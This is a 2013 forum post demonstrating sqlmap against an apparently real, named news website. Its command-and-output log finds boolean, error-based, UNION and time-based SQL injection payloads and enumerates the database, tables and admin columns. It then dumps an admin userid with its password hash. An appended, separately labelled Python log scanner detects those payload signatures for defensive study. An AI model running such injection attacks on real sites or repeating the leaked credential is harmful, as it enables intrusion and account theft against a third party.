sqlmap example: injecting MySQL

Original poster, posted on 2013-4-4 22:18:49
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user       /* Note: get the current user name */

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user:    'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db                  /* current database */

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database:    'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables  -D "wepost"         /* get the table names of the current database */

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /* get the column names of the admin table */

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

[*] shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /* get the contents of the columns */

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

[*] shutting down at: 16:58:14

D:\Python27\sqlmap>
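Every step of the enumeration above is driven by the same four payload families sqlmap reported for the id parameter (boolean-based blind, error-based, UNION query, time-based blind), and each of them lands verbatim in the web server's access log. The Python below is an added example, not code from the post and not sqlmap's own code: it parses Apache combined-format log lines, URL-decodes each query parameter and flags requests that carry one of those four signatures, then groups hits per source address. The log lines are constructed for the example (the payloads are the ones listed in the session, URL-encoded), and the function names classify_request, scan_access_log and summarize are hypothetical.

```python
"""Flag sqlmap-style injection probes in web-server access logs.

Added example, not code from the forum post or from sqlmap. The signatures
correspond to the four payload families sqlmap reported in the session above.
SAMPLE_LOG is constructed traffic, and the function names are hypothetical.
"""
import re
from urllib.parse import unquote_plus, urlsplit, parse_qsl

# One compiled pattern per technique, matched against the fully URL-decoded,
# lower-cased parameter value so %20, '+' and mixed case do not hide a probe.
SIGNATURES = {
    # id=276 AND 799=799 : a tautology appended to a numeric parameter
    "boolean-based blind": re.compile(r"\b(and|or)\s+(\d+)\s*=\s*\2\b"),
    # FLOOR(RAND(0)*2) ... GROUP BY x)a) : duplicate-key error trick
    "error-based": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)|group\s+by\s+x\s*\)\s*a\s*\)"),
    # -8474 UNION ALL SELECT NULL, NULL, ... : column-count probing
    "UNION query": re.compile(r"union\s+(all\s+)?select\s+null"),
    # AND SLEEP(5) : time-based blind
    "time-based blind": re.compile(r"\b(sleep|benchmark)\s*\("),
}

# Apache combined log format; only the fields needed below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def classify_request(target: str) -> dict:
    """Return {parameter: [techniques]} for each query parameter of a request
    target that matches at least one signature; {} for a clean request."""
    hits = {}
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl already decoded once; decoding again catches double-encoded
        # payloads (a literal '+' that survived the first pass becomes a space).
        decoded = unquote_plus(value).lower()
        techniques = [t for t, rx in SIGNATURES.items() if rx.search(decoded)]
        if techniques:
            hits[name] = techniques
    return hits


def scan_access_log(lines) -> list:
    """One finding per (request, parameter) pair that matches a signature."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than crash the scan
        for param, techniques in classify_request(m["target"]).items():
            findings.append({"ip": m["ip"], "ts": m["ts"], "param": param,
                             "techniques": techniques, "status": int(m["status"])})
    return findings


def summarize(findings) -> dict:
    """Group findings per source IP. One address cycling through several
    families against the same parameter within seconds is the tool fingerprint
    the session above shows; a single tautology alone may be a false positive."""
    per_ip = {}
    for f in findings:
        entry = per_ip.setdefault(f["ip"], {"hits": 0, "techniques": set(), "params": set()})
        entry["hits"] += 1
        entry["techniques"].update(f["techniques"])
        entry["params"].add(f["param"])
    return per_ip


# Constructed sample log lines (not real traffic); addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Apr/2013:16:53:54 +0800] "GET /article.php?id=276 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [04/Apr/2013:16:53:54 +0800] "GET /article.php?id=276%20AND%20799%3D799 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [04/Apr/2013:16:53:55 +0800] "GET /article.php?id=276%20AND%20(SELECT%208404%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT%20(CASE%20WHEN%20(8404%3D8404)%20THEN%201%20ELSE%200%20END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) HTTP/1.1" 500 312',
    '203.0.113.5 - - [04/Apr/2013:16:53:55 +0800] "GET /article.php?id=-8474%20UNION%20ALL%20SELECT%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20CONCAT(CHAR(58,99,118,120,58),CHAR(32)),%20NULL,%20NULL,%20NULL%23 HTTP/1.1" 200 4801',
    '203.0.113.5 - - [04/Apr/2013:16:53:56 +0800] "GET /article.php?id=276+AND+SLEEP(5) HTTP/1.1" 200 5120',
    '198.51.100.7 - - [04/Apr/2013:16:55:01 +0800] "GET /article.php?id=277 HTTP/1.1" 200 4990',
]

if __name__ == "__main__":
    for ip, info in summarize(scan_access_log(SAMPLE_LOG)).items():
        print(ip, info["hits"], sorted(info["techniques"]), sorted(info["params"]))
```

Run on the constructed lines, the scan attributes four findings to 203.0.113.5, all on the id parameter and covering all four families, and nothing to 198.51.100.7, whose request is an ordinary article lookup. The 500 status on the error-based probe is the same tell a defender sees in server error logs. Detection is only the second line of defence here: the root cause in the session above is that article.php interpolates id into the query, and the durable fix is a parameterized query (or an integer cast on id before it reaches SQL) rather than pattern matching on the way in.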